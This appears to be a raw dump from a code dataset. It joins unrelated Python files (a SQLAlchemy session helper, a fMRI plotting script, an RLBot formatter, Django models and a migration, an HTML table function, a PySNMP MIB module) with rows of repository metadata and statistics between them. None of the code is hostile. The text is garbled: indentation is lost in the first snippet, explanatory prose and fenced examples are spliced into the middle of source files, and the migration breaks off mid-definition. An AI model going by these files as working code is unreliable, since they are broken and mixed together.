Session = sessionmaker(bind=engine, autoflush=False, autocommit=False)
Base = declarative_base()
def get_session():
session = Session()
try:
yield session
finally:
session.close()
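`get_session` is a dependency-style generator: the caller receives the session at `yield`, and the `finally` block guarantees `close()` runs even when the caller stops early. The control flow can be checked with a stand-in session class (no database needed):

```python
class DummySession:
    """Stand-in for the SQLAlchemy Session, tracking close() calls."""
    def __init__(self):
        self.closed = False

    def close(self):
        self.closed = True

def get_session():
    session = DummySession()
    try:
        yield session
    finally:
        session.close()

gen = get_session()
session = next(gen)      # caller receives the open session
assert not session.closed
gen.close()              # throwing GeneratorExit runs the finally block
assert session.closed
```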
| 23.777778 | 87 | 0.739875 | 83 | 642 | 5.554217 | 0.421687 | 0.086768 | 0.10846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001805 | 0.137072 | 642 | 26 | 88 | 24.692308 | 0.830325 | 0 | 0 | 0 | 0 | 0 | 0.154206 | 0.090343 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.105263 | 0.210526 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7afeb71053feedae92609691ef2291871af9e5e1 | 7,346 | py | Python | src/visualization/visualize_all.py | mwegrzyn/volume-wise-language | ed24b11667e6b26d3ed09ce0aae383c26852821c | [
"MIT"
] | 1 | 2019-11-19T13:48:33.000Z | 2019-11-19T13:48:33.000Z | src/visualization/visualize_all.py | mwegrzyn/volume-wise-language | ed24b11667e6b26d3ed09ce0aae383c26852821c | [
"MIT"
] | null | null | null | src/visualization/visualize_all.py | mwegrzyn/volume-wise-language | ed24b11667e6b26d3ed09ce0aae383c26852821c | [
"MIT"
] | null | null | null |
# coding: utf-8
# # Collect axes and make big plot
#
# This notebook is used to collect the output of all analyses which were run for a single patient and to wrap all generated figures in a big plot which consists of multiple subplots. As with other notebooks needed to analyse single-subject data, this one uses the "tag" attribute of the cells to decide which cells should not run in toolbox mode and which ones have to run in toolbox mode. This makes it possible to convert them to .py scripts which can then be used by the src module.
# ### import modules
# In[1]:
import os
import glob
import pickle
from PIL import Image
import matplotlib.pyplot as plt
import seaborn as sns
# In[2]:
sns.set_context('poster')
sns.set_style('ticks')
# In[3]:
# after conversion to .py, we can use __file__ to get the module folder
try:
thisDir = os.path.realpath(__file__)
# in notebook form, we take the current working directory (we need to be in 'notebooks/' for this!)
except NameError:
thisDir = '.'
# convert relative path into absolute path, so this will work with notebooks and py modules
supDir = os.path.abspath(os.path.join(os.path.dirname(thisDir), '..'))
supDir
# ### get data
#
## In[4]:
#
#
#MY_DIR = '../examples/'
#
#
#
## In[5]:
#
#
#p_name = 'patID'
#
#
# ### collect plots
# In[6]:
def get_plots(MY_DIR,p_name):
subplot_dict = {}
axes_list = glob.glob('%s%s*.png'%(MY_DIR,p_name))
for a in axes_list:
plot_name = a.split('_')[-1].split('.')[0]
subplot_dict[plot_name] = a
return subplot_dict
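`get_plots` relies on a `<patient>_<plotname>.png` naming convention; the parsing step can be verified on a made-up filename:

```python
# hypothetical file produced by an earlier analysis step
a = './examples/patID_donut.png'
plot_name = a.split('_')[-1].split('.')[0]
print(plot_name)
```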
#
## In[7]:
#
#
#subplot_dict = get_plots(MY_DIR,p_name)
#
#
#
## In[8]:
#
#
#subplot_dict
#
#
# ### outline of subplot arrangement
#
## In[9]:
#
#
#fig = plt.figure(figsize=(16, 6))
#
#ax1 = fig.add_axes([0, 2.8, 1.55, 1.], xticklabels=[], yticklabels=[]);ax1.set_title(1,fontsize=100,y=0.5)
#ax2 = fig.add_axes([0.35, 2.8, .85, .25], xticklabels=[], yticklabels=[]);ax2.set_title(2,fontsize=100,y=0.5)
#ax3 = fig.add_axes([0, 1.5, 1.55, 1.25], xticklabels=[], yticklabels=[]);ax3.set_title(3,fontsize=100,y=0.5)
#ax4 = fig.add_axes([0.2, -0.05, 1.15, 1.5], xticklabels=[], yticklabels=[]);ax4.set_title(4,fontsize=100,y=0.5)
#ax5 = fig.add_axes([.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[]);ax5.set_title(5,fontsize=100,y=0.5)
#ax6 = fig.add_axes([.55, -1.3, .45, 1.15], xticklabels=[], yticklabels=[]);ax6.set_title(6,fontsize=100,y=0.5)
#ax7 = fig.add_axes([1.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[]);ax7.set_title(7,fontsize=100,y=0.5)
#ax8 = fig.add_axes([1.25, 0.05, .3, 1.15], xticklabels=[], yticklabels=[]);ax8.set_title(8,fontsize=100,y=0.5)
#
#plt.show()
#
#
# ### make a legend for all
#
## In[10]:
#
#
#colors_file = os.path.join(supDir,'models','colors.p')
#with open(colors_file, 'rb') as f:
# color_dict = pickle.load(f)
#
#my_cols = {}
#for i, j in zip(['red', 'blue', 'yellow'], ['left', 'right', 'bilateral']):
# my_cols[j] = color_dict[i]
#
#
#
## In[11]:
#
#
#plt.figure(figsize=(5.6,3))
#for group in my_cols.keys():
# plt.plot([-1,-1],'o',c=my_cols[group],label=group)
#plt.bar(-1,-1,color=color_dict['trans'],label='task sections')
#plt.bar(-1,-1,color=color_dict['black'],alpha=0.2,label='standard deviation')
#plt.xlim(0,1)
#plt.ylim(0,1)
#plt.legend(bbox_to_anchor=(0, 0., 1, 1),mode='expand')
#plt.xticks([])
#plt.yticks([])
#sns.despine(left=True,bottom=True)
#plt.savefig('%slegend.png'%MY_DIR,dpi=300,bbox_inches='tight')
#plt.show()
#
#
# ### fill subplots with content
# In[12]:
sns.set_style('dark')
#
## In[13]:
#
#
#subplot_dict.keys()
#
#
#
## In[19]:
#
#
#fig = plt.figure(figsize=(16, 6))
#
#ax1 = fig.add_axes([0, 2.8, 1.55, 1.], xticklabels=[], yticklabels=[])
#ax1.imshow(Image.open(subplot_dict['tMapBrain']))
#
#ax2 = fig.add_axes([0.45, 2.8, .65, .25], xticklabels=[], yticklabels=[])
#ax2.imshow(Image.open(subplot_dict['tMapCbar']))
#
#ax3 = fig.add_axes([0, 1.5, 1.55, 1.25], xticklabels=[], yticklabels=[])
#ax3.imshow(Image.open(subplot_dict['timeAll200trs']))
#
#ax4 = fig.add_axes([0.2, -0.05, 1.15, 1.5], xticklabels=[], yticklabels=[])
#ax4.imshow(Image.open(subplot_dict['timeCycle20trs']))
#
#ax5 = fig.add_axes([.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
#ax5.imshow(Image.open(subplot_dict['donut']))
#
#ax6 = fig.add_axes([.55, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
#ax6.imshow(Image.open(subplot_dict['predSpace']))
#
#ax7 = fig.add_axes([1.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
#ax7.imshow(Image.open(subplot_dict['logFunc']))
#
#ax8 = fig.add_axes([1.25, 0.05, .3, 1.25], xticklabels=[], yticklabels=[])
#ax8.imshow(Image.open('../examples/legend.png'))
#
#plt.text(0, 0.8, 'A',transform=ax1.transAxes, fontsize=64)
#plt.text(0, -0.2, 'B',transform=ax1.transAxes, fontsize=64)
#plt.text(0.19, -2, 'C',transform=ax1.transAxes, fontsize=64)
#plt.text(0.03, -4.1, 'D',transform=ax1.transAxes, fontsize=64)
#plt.text(0.35, -4.1, 'E',transform=ax1.transAxes, fontsize=64)
#plt.text(0.675, -4.1, 'F',transform=ax1.transAxes, fontsize=64)
#
#plt.savefig('../reports/figures/16-individual-example-plot.png',dpi=300,bbox_inches='tight')
#
#plt.show()
#
#
# #### toolbox use
legend_filename = os.path.join(supDir,'visualization','legend.png')
def make_p(pFolder,pName,legend_filename=legend_filename):
subplot_dict = get_plots(pFolder,pName)
fig = plt.figure(figsize=(16, 6))
ax1 = fig.add_axes([0, 1.5, 1.55, 1.25], xticklabels=[], yticklabels=[])
ax1.imshow(Image.open(subplot_dict['timeAll200trs']))
ax2 = fig.add_axes([0.2, -0.05, 1.15, 1.5], xticklabels=[], yticklabels=[])
ax2.imshow(Image.open(subplot_dict['timeCycle20trs']))
ax3 = fig.add_axes([.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
ax3.imshow(Image.open(subplot_dict['donut']))
ax4 = fig.add_axes([.55, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
ax4.imshow(Image.open(subplot_dict['predSpace']))
ax5 = fig.add_axes([1.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
ax5.imshow(Image.open(subplot_dict['logFunc']))
ax6 = fig.add_axes([1.25, 0.05, .3, 1.25], xticklabels=[], yticklabels=[])
ax6.imshow(Image.open(legend_filename))
plt.suptitle(pName,fontsize=48,x=0.75,y=2.95)
out_name = os.path.join(pFolder,''.join([pName,'_all.png']))
plt.savefig(out_name,dpi=300,bbox_inches='tight')
plt.close()
return out_name
# ### summary
#
# Seeing the results on the level of N=1 gives a more in-depth perspective on the data and on the robustness of the analyses in the single case. Most of the plots generated here make it possible to combine prospectively collected data with the original dataset which was used to train the models. Some of the plots only make sense on the single-subject level; for example, the volume-wise classification on the time course could not be represented in an intelligible way on the group level. Also, using a doughnut plot only makes sense on the individual level. The different ways of visualizing the data contain some amount of redundancy, but in a clinical context/for an application this can be useful for spotting (in)consistencies and looking at the same dataset from varying points of view.
#
#
# **************
#
# < [Previous](15-mw-visualize-logistic-regression.ipynb) | [Contents](00-mw-overview-notebook.ipynb)
| 29.502008 | 788 | 0.668255 | 1,201 | 7,346 | 4.003331 | 0.263114 | 0.027454 | 0.045757 | 0.054908 | 0.404742 | 0.375 | 0.320923 | 0.300125 | 0.208611 | 0.208611 | 0 | 0.066468 | 0.133678 | 7,346 | 248 | 789 | 29.620968 | 0.689032 | 0.702151 | 0 | 0 | 1 | 0 | 0.056585 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0 | 0.139535 | 0 | 0.232558 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb0075e257517d7ea8e7b80a522763cdff7b8198 | 1,178 | py | Python | dragonbot/game/output.py | Chainso/DragonBot | c431cd42be8672259164c9ee4ab338cbc624bec9 | [
"MIT"
] | null | null | null | dragonbot/game/output.py | Chainso/DragonBot | c431cd42be8672259164c9ee4ab338cbc624bec9 | [
"MIT"
] | null | null | null | dragonbot/game/output.py | Chainso/DragonBot | c431cd42be8672259164c9ee4ab338cbc624bec9 | [
"MIT"
] | null | null | null | import torch
import numpy as np
from rlbot.agents.base_agent import SimpleControllerState, BaseAgent
class OutputFormatter():
"""
A class to format model output
"""
def transform_action(self, action):
"""
Transforms the action into a controller state.
"""
action = action[0].detach().cpu().numpy()
# Convert the last 3 actions to their boolean values
action = np.concatenate((action[:5], (action[5:] >= 0)), axis = 0)
controller_out = BaseAgent.convert_output_to_v4(self, action)
return controller_out
def transform_output(self, model_output):
"""
Transforms the output to the new controller state and the action or
state value.
"""
action, val = model_output
action = self.transform_action(action)
val = val.detach()
return action, val
@staticmethod
def action_space():
"""
Returns the number of output actions.
"""
return 8
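The first five model outputs stay analog while the last three are thresholded into button presses; the conversion in `transform_action` can be exercised on made-up values:

```python
import numpy as np

# eight raw outputs: five analog axes, then three button logits
action = np.array([0.1, -0.3, 0.9, 0.0, 0.5, 0.7, -0.2, 0.4])
out = np.concatenate((action[:5], (action[5:] >= 0)), axis=0)
print(out[5:])  # booleans are cast to 0.0 / 1.0 by the float concatenate
```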
class RecurrentOutputFormatter(OutputFormatter):
def transform_action(self, action):
return OutputFormatter.transform_action(self, action[0]) | 26.772727 | 75 | 0.634975 | 133 | 1,178 | 5.518797 | 0.421053 | 0.081744 | 0.077657 | 0.10218 | 0.076294 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010539 | 0.275042 | 1,178 | 44 | 76 | 26.772727 | 0.848946 | 0.211375 | 0 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.15 | 0.05 | 0.65 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bb124a8e52d8aee500e19c656533c54c1cedaf7a | 1,252 | py | Python | openbook_notifications/models/post_reaction_notification.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 164 | 2019-07-29T17:59:06.000Z | 2022-03-19T21:36:01.000Z | openbook_notifications/models/post_reaction_notification.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 188 | 2019-03-16T09:53:25.000Z | 2019-07-25T14:57:24.000Z | openbook_notifications/models/post_reaction_notification.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 80 | 2019-08-03T17:49:08.000Z | 2022-02-28T16:56:33.000Z | from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from openbook_notifications.models.notification import Notification
from openbook_posts.models import PostReaction
class PostReactionNotification(models.Model):
notification = GenericRelation(Notification, related_name='post_reaction_notifications')
post_reaction = models.ForeignKey(PostReaction, on_delete=models.CASCADE)
@classmethod
def create_post_reaction_notification(cls, post_reaction_id, owner_id):
post_reaction_notification = cls.objects.create(post_reaction_id=post_reaction_id)
Notification.create_notification(type=Notification.POST_REACTION,
content_object=post_reaction_notification,
owner_id=owner_id)
return post_reaction_notification
@classmethod
def delete_post_reaction_notification(cls, post_reaction_id, owner_id):
cls.objects.filter(post_reaction_id=post_reaction_id,
notification__owner_id=owner_id).delete()
@classmethod
def delete_post_reaction_notifications(cls, post_reaction_id):
cls.objects.filter(post_reaction_id=post_reaction_id).delete()
| 46.37037 | 92 | 0.750799 | 137 | 1,252 | 6.489051 | 0.270073 | 0.24297 | 0.141732 | 0.091114 | 0.371204 | 0.267717 | 0.267717 | 0.209224 | 0.209224 | 0.103487 | 0 | 0 | 0.189297 | 1,252 | 26 | 93 | 48.153846 | 0.875862 | 0 | 0 | 0.142857 | 0 | 0 | 0.021566 | 0.021566 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.190476 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb1b93056048ded04fe462901d7cdde0ccfcd081 | 4,991 | py | Python | astetik/tables/table.py | meirm/astetik | ea05ce57a0bf1e8bd7ef18c4d5ca8d7ad3fb4be7 | [
"MIT"
] | 8 | 2017-07-27T11:25:41.000Z | 2019-03-11T12:02:48.000Z | astetik/tables/table.py | meirm/astetik | ea05ce57a0bf1e8bd7ef18c4d5ca8d7ad3fb4be7 | [
"MIT"
] | 33 | 2018-04-04T20:45:59.000Z | 2019-03-07T12:54:37.000Z | astetik/tables/table.py | meirm/astetik | ea05ce57a0bf1e8bd7ef18c4d5ca8d7ad3fb4be7 | [
"MIT"
] | 3 | 2018-10-19T15:50:55.000Z | 2018-10-23T04:32:39.000Z | import pandas as pd
from IPython.core.display import display, HTML
def table(data,
title="Descriptive Stats",
sub_title="",
table_width=630,
indexcol_width=150,
return_html=False):
'''Displays a publication quality data table
with any number of columns and aspects. Works
best for 6-7 or less columns datasets.
data | DataFrame | a dataframe with three columns of numeric data
title | str | the main title of the table
sub_title | str | shown below the title
table_width | int | the width of the table in pixels
indexcol_width | int | the width of the index column in pixels.
Width of the data columns is computed based on `table_width` and
`indexcol_width` values.
'''
html = '''
<style type=\"text/css\">
.tg {
border-collapse:collapse;
border-spacing:0;
border:none;}
.tg td {
font-family: Arial, sans-serif;
font-size:14px;
padding:10px 5px;
border-style:solid;
border-width:0px;
overflow:hidden;
word-break:normal;
}
.tg th {
font-family:Arial, sans-serif,
sans-serif;
font-size:14px;
font-weight:normal;
padding:10px 5px;
border-style:solid;
border-width:0px;
overflow:hidden;
word-break:normal;
}
.tg .tg-index {
font-family:Verdana, Geneva, sans-serif !important;
text-align: left;
padding-left: 10px;
vertical-align:top
}
.tg .tg-anay {
font-family:Verdana, Geneva, sans-serif !important;
text-align:right;
vertical-align:top
}
.tg .tg-jua3 {
font-weight:bold;
font-family:Verdana, Geneva, sans-serif !important;
text-align:right;vertical-align:top
}
hr {
height: 1px;
background-color: #333;
padding: 0px;
margin: 0px;
}
.hr2 {
height: 2px !important;
background-color: #333;
}
table {
table-layout: fixed;
width: 500px;
border-style:hidden;
border-collapse: collapse;\"
margin-top: 0px;
padding-top: 0px;
}
.title {
font-family: Arial, sans-serif;
font-style: italic;
font-size: 22px;
font-weight: bold;
padding-bottom: 0px;
}
.sub_title {
font-size: 18px;
font-family: Arial, sans-serif;
margin-top: 8px !important;
padding-bottom: 12px;
}
</style>
<table class=\"tg\">
<colgroup>
<col style=\"width: _INDEXCOL_WIDTH_px\">
<col style=\"width: _COL_WIDTH_px\">
<col style=\"width: _COL_WIDTH_px\">
<col style=\"width: _COL_WIDTH_px\">
<col style=\"width: _COL_WIDTH_px\">
</colgroup>
<p class='title'> _TABLE_TITLE_ </p>
<p class='sub_title'> _TABLE_SUBTITLE_ </p>
<hr align=\"left\", width=\"_TABLE_WIDTH_\">
<tr>
<th class=\"tg-index\"></th>
'''
# add columns
for col in data.columns:
html += '<th class=\"tg-anay\">' + str(col) + '</th>'
for index in data.index:
html += '</tr><tr><td class=\"tg-index\">' + str(index) + '</td>'
for col in data.columns:
html += '<td class=\"tg-jua3\">' + f'{data.loc[index][col]:,}' + '</td>'
html +='''
</tr>
</table>
<hr align=\"left\", width=\"_TABLE_WIDTH_\">
'''
col_width = int((table_width - indexcol_width) / len(data.columns))
html = html.replace('_TABLE_TITLE_', title)
html = html.replace('_TABLE_SUBTITLE_', sub_title)
html = html.replace('_TABLE_WIDTH_', str(table_width))
html = html.replace('_COL_WIDTH_', str(col_width))
html = html.replace('_INDEXCOL_WIDTH_', str(indexcol_width))
display(HTML(html))
if return_html:
return html | 31 | 84 | 0.445001 | 474 | 4,991 | 4.556962 | 0.278481 | 0.037037 | 0.030093 | 0.035185 | 0.362037 | 0.275463 | 0.204167 | 0.204167 | 0.204167 | 0.181019 | 0 | 0.017825 | 0.449209 | 4,991 | 161 | 85 | 31 | 0.767916 | 0.099579 | 0 | 0.293103 | 0 | 0 | 0.79901 | 0.039838 | 0.008621 | 0 | 0 | 0 | 0 | 1 | 0.008621 | false | 0 | 0.060345 | 0 | 0.077586 | 0.008621 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1
bb216b1449c4bdf268511506ad9bcc2b2c3b4fcc | 7,032 | py | Python | pysnmp/TIMETRA-CLEAR-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/TIMETRA-CLEAR-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/TIMETRA-CLEAR-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module TIMETRA-CLEAR-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/TIMETRA-CLEAR-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:09:48 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
IpAddress, Bits, Integer32, Counter64, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, TimeTicks, Gauge32, Unsigned32, Counter32, ObjectIdentity, ModuleIdentity, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "IpAddress", "Bits", "Integer32", "Counter64", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "TimeTicks", "Gauge32", "Unsigned32", "Counter32", "ObjectIdentity", "ModuleIdentity", "MibIdentifier")
TimeStamp, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TimeStamp", "DisplayString", "TextualConvention")
tmnxSRNotifyPrefix, tmnxSRObjs, tmnxSRConfs, timetraSRMIBModules = mibBuilder.importSymbols("TIMETRA-GLOBAL-MIB", "tmnxSRNotifyPrefix", "tmnxSRObjs", "tmnxSRConfs", "timetraSRMIBModules")
tmnxEventAppIndex, = mibBuilder.importSymbols("TIMETRA-LOG-MIB", "tmnxEventAppIndex")
TmnxActionType, TNamedItem = mibBuilder.importSymbols("TIMETRA-TC-MIB", "TmnxActionType", "TNamedItem")
timetraClearMIBModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 6527, 1, 1, 3, 13))
timetraClearMIBModule.setRevisions(('1905-01-24 00:00', '1904-06-02 00:00', '1904-01-15 00:00', '1903-08-15 00:00', '1903-01-20 00:00', '1902-02-27 00:00',))
if mibBuilder.loadTexts: timetraClearMIBModule.setLastUpdated('0501240000Z')
if mibBuilder.loadTexts: timetraClearMIBModule.setOrganization('Alcatel-Lucent')
tmnxClearObjs = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13))
tmnxClearNotificationsPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 3, 13))
tmnxClearNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 3, 13, 0))
tmnxClearConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13))
tmnxClearTable = MibTable((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1), )
if mibBuilder.loadTexts: tmnxClearTable.setStatus('current')
tmnxClearEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1), ).setIndexNames((0, "TIMETRA-LOG-MIB", "tmnxEventAppIndex"), (0, "TIMETRA-CLEAR-MIB", "tmnxClearIndex"))
if mibBuilder.loadTexts: tmnxClearEntry.setStatus('current')
tmnxClearIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)))
if mibBuilder.loadTexts: tmnxClearIndex.setStatus('current')
tmnxClearName = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 2), TNamedItem()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tmnxClearName.setStatus('current')
tmnxClearParams = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255)).clone(hexValue="")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: tmnxClearParams.setStatus('current')
tmnxClearAction = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 4), TmnxActionType().clone('notApplicable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: tmnxClearAction.setStatus('current')
tmnxClearLastClearedTime = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 5), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tmnxClearLastClearedTime.setStatus('current')
tmnxClearResult = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("success", 1), ("failure", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: tmnxClearResult.setStatus('current')
tmnxClearErrorText = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: tmnxClearErrorText.setStatus('current')
tmnxClear = NotificationType((1, 3, 6, 1, 4, 1, 6527, 3, 1, 3, 13, 0, 1)).setObjects(("TIMETRA-CLEAR-MIB", "tmnxClearName"), ("TIMETRA-CLEAR-MIB", "tmnxClearParams"), ("TIMETRA-CLEAR-MIB", "tmnxClearLastClearedTime"), ("TIMETRA-CLEAR-MIB", "tmnxClearResult"), ("TIMETRA-CLEAR-MIB", "tmnxClearErrorText"))
if mibBuilder.loadTexts: tmnxClear.setStatus('current')
tmnxClearCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 1))
tmnxClearGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 2))
tmnxClearCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 1, 1)).setObjects(("TIMETRA-CLEAR-MIB", "tmnxClearGroup"), ("TIMETRA-CLEAR-MIB", "tmnxClearNotificationGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    tmnxClearCompliance = tmnxClearCompliance.setStatus('current')
tmnxClearGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 2, 1)).setObjects(("TIMETRA-CLEAR-MIB", "tmnxClearName"), ("TIMETRA-CLEAR-MIB", "tmnxClearParams"), ("TIMETRA-CLEAR-MIB", "tmnxClearAction"), ("TIMETRA-CLEAR-MIB", "tmnxClearLastClearedTime"), ("TIMETRA-CLEAR-MIB", "tmnxClearResult"), ("TIMETRA-CLEAR-MIB", "tmnxClearErrorText"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    tmnxClearGroup = tmnxClearGroup.setStatus('current')
tmnxClearNotificationGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 2, 2)).setObjects(("TIMETRA-CLEAR-MIB", "tmnxClear"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    tmnxClearNotificationGroup = tmnxClearNotificationGroup.setStatus('current')
mibBuilder.exportSymbols("TIMETRA-CLEAR-MIB", tmnxClearName=tmnxClearName, tmnxClearAction=tmnxClearAction, tmnxClearGroups=tmnxClearGroups, tmnxClearCompliance=tmnxClearCompliance, tmnxClearCompliances=tmnxClearCompliances, timetraClearMIBModule=timetraClearMIBModule, tmnxClearLastClearedTime=tmnxClearLastClearedTime, tmnxClear=tmnxClear, tmnxClearParams=tmnxClearParams, tmnxClearNotifications=tmnxClearNotifications, tmnxClearResult=tmnxClearResult, PYSNMP_MODULE_ID=timetraClearMIBModule, tmnxClearTable=tmnxClearTable, tmnxClearNotificationsPrefix=tmnxClearNotificationsPrefix, tmnxClearObjs=tmnxClearObjs, tmnxClearConformance=tmnxClearConformance, tmnxClearErrorText=tmnxClearErrorText, tmnxClearNotificationGroup=tmnxClearNotificationGroup, tmnxClearEntry=tmnxClearEntry, tmnxClearIndex=tmnxClearIndex, tmnxClearGroup=tmnxClearGroup)

# File: apps/shows/migrations/0006_comment.py (repo: jorgesaw/oclock, license: MIT)
# Generated by Django 2.2.13 on 2020-09-27 03:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('shows', '0005_auto_20200923_0900'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, help_text='Date time on which the object was created.', verbose_name='created at')),
('modified', models.DateTimeField(auto_now=True, help_text='Date time on which the object was last modified.', verbose_name='modified at')),
('active', models.BooleanField(default=True, verbose_name='Activo')),
('comment', models.CharField(blank=True, max_length=210, null=True, verbose_name='comment')),
('subject', models.CharField(blank=True, max_length=50, null=True, verbose_name='subject')),
